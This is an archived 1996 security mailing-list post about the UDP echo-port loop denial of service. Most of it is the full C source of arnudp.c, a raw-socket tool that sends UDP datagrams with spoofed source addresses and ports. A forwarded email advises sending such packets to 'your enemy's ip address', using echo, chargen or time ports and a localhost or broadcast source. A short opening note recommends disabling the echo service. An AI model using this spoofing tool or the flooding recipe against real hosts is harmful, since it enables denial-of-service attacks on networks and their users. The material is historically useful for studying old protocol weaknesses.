/*

From B.O.S. 2/05/96

I noticed someone mentioning the echo port. My advice is to disable the 
echo service completely. It is often used by hackers to hang a computer.

Try sending a packet from port 7 your ip to port 7 your ip.

The system will bounce the packet back and forth slowing the system 
drastically.

A Hacker Program I have seen used to do this is called arnudp.c 

*/

/************************************************************************/
/* arnudp.c version 0.01 by Arny - cs6171@scitsc.wlv.ac.uk		*/
/* Sends a single udp datagram with the source/destination address/port	*/
/* set to whatever you want.  Unfortunately Linux 1.2 and SunOS 4.1	*/
/* don't seem to have the IP_HDRINCL option, so the source address will	*/
/* be set to the real address.  It does however work ok on SunOS 5.4.	*/
/* Should compile fine with just an ANSI compiler (such as gcc) under	*/
/* Linux and SunOS 4.1, but with SunOS 5.4 you have to specify extra	*/
/* libraries on the command line:					*/
/* 	/usr/ucb/cc -o arnudp arnudp001.c -lsocket -lnsl		*/
/* I'll state the obvious - this needs to be run as root!  Do not use	*/
/* this program unless you know what you are doing, as it is possible	*/
/* that you could confuse parts of your network	/ internet.		*/
/* (c) 1995 Arny - I accept no responsiblity for anything this does.	*/
/************************************************************************/
/* I used the source of traceroute as an example while writing this.	*/
/* Many thanks to Dan Egnor (egnor@ugcs.caltech.edu) and Rich Stevens	*/
/* for pointing me in the right direction.				*/
/************************************************************************/
 
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in_systm.h>
#include<netinet/in.h>
#include<netinet/ip.h>
#include<netinet/udp.h>
#include<errno.h>
#include<string.h>
#include<netdb.h>
#include<arpa/inet.h>
#include<stdio.h>

struct sockaddr sa;

main(int argc,char **argv)
{
int fd;
int x=1;
struct sockaddr_in *p;
struct hostent *he;
u_char gram[38]=
	{
	0x45,	0x00,	0x00,	0x26,
	0x12,	0x34,	0x00,	0x00,
	0xFF,	0x11,	0,	0,
	0,	0,	0,	0,
	0,	0,	0,	0,

	0,	0,	0,	0,
	0x00,	0x12,	0x00,	0x00,

	'1','2','3','4','5','6','7','8','9','0'
	};

if(argc!=5)
	{
	fprintf(stderr,"usage: %s sourcename sourceport destinationname destinationport\n",*argv);
	exit(1);
	};

if((he=gethostbyname(argv[1]))==NULL)
	{
	fprintf(stderr,"can't resolve source hostname\n");
	exit(1);
	};
bcopy(*(he->h_addr_list),(gram+12),4);

if((he=gethostbyname(argv[3]))==NULL)
	{
	fprintf(stderr,"can't resolve destination hostname\n");
	exit(1);
	};
bcopy(*(he->h_addr_list),(gram+16),4);

*(u_short*)(gram+20)=htons((u_short)atoi(argv[2]));
*(u_short*)(gram+22)=htons((u_short)atoi(argv[4]));

p=(struct sockaddr_in*)&sa;
p->sin_family=AF_INET;
bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));

if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
	{
	perror("socket");
	exit(1);
	};

#ifdef IP_HDRINCL
fprintf(stderr,"we have IP_HDRINCL :-)\n\n");
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
	{
	perror("setsockopt IP_HDRINCL");
	exit(1);
        };
#else
fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
#endif

if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1)
	{
	perror("sendto");
	exit(1);
	};

printf("datagram sent without error:");
for(x=0;x<(sizeof(gram)/sizeof(u_char));x++)
	{
	if(!(x%4)) putchar('\n');
	printf("%02x",gram[x]);
	};
putchar('\n');

}
From route@infonexus.com Wed Feb  7 12:33:42 1996
Return-Path: route
Received: (from route@localhost) by onyx.infonexus.com (8.6.12/8.6.9) id MAA16853 for root; Wed, 7 Feb 1996 12:33:42 -0800
From: Infinity <route@infonexus.com>
Message-Id: <199602072033.MAA16853@onyx.infonexus.com>
Subject: Re: BoS: Re: Echo Vunerebility (fwd)
To: root@infonexus.com (demon)
Date: Wed, 7 Feb 1996 12:33:41 -0800 (PST)
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1068      
Status: RO

Hadmut Danisch braved the dark, cold unknown with:
>From owner-best-of-security@suburbia.net Wed Feb  7 04:39:35 1996
X-Authentication-Warning: suburbia.net: majordom set sender to owner-best-of-security using -f
Date: Wed, 7 Feb 1996 12:42:17 +0100
From: danisch@ira.uka.de (Hadmut Danisch)
Message-Id: <9602071142.AA00605@elysion.eiss.ira.uka.de>
To: best-of-security@suburbia.net
Subject: Re: BoS: Re: Echo Vunerebility
X-Sun-Charset: US-ASCII
Sender: owner-best-of-security@suburbia.net
Errors-to: nobody@mail.uu.net
Precedence: bulk
Reply-To: nobody@mail.uu.net

> Try sending a packet from port 7 your ip to port 7 your ip.


Send a udp packet to your enemy's ip address, for both port
numbers use one of echo/chargen/time , and use either
127.0.0.1 or broadcast as the From-address.

He will have a lot of fun...


Hadmut Danisch
European Institute for System Security E.I.S.S.



-- 
infiNity .oOo.  Member of the infamous Guild |  spreading information 
route .oOo.  Use strong Cryptography |  like it was going 
daemon9 .oOo.  Finger for info |  out of style